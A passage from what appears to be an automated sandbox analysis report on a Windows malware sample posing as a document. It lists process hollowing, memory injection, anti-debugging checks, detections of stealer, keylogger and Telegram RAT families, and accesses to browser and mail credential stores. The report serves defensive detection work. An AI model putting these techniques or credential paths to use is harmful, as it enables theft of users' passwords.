          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_1F6EE660 LdrInitializeThunk,LdrInitializeThunk,4_2_1F6EE660
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029D87A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0040ADB0 GetProcessHeap,HeapFree,4_2_0040ADB0
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004123F1 SetUnhandledExceptionFilter,4_1_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004123F1 SetUnhandledExceptionFilter,9_2_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_1_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004123F1 SetUnhandledExceptionFilter,9_1_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFSection unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 400000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory written: C:\Users\Public\Libraries\xzeheenC.pif base: 36C008Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory written: C:\Users\Public\Libraries\xzeheenC.pif base: 2D6008Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory written: C:\Users\Public\Libraries\xzeheenC.pif base: 3BD008
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pifJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pifJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C5A78
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: GetLocaleInfoA,0_2_029CA798
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: GetLocaleInfoA,0_2_029CA74C
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C5B84
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: GetLocaleInfoA,4_2_00417A20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: GetLocaleInfoA,4_1_00417A20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: GetLocaleInfoA,9_2_00417A20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: GetLocaleInfoA,9_1_00417A20
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AD5A78
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: GetLocaleInfoA,10_2_02ADA798
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AD5B83
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C9194 GetLocalTime,0_2_029C9194
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CB714 GetVersionExA,0_2_029CB714
          Source: C:\Users\Public\Libraries\xzeheenC.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected PureLog Stealer
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D37F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected PureLog Stealer
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPE
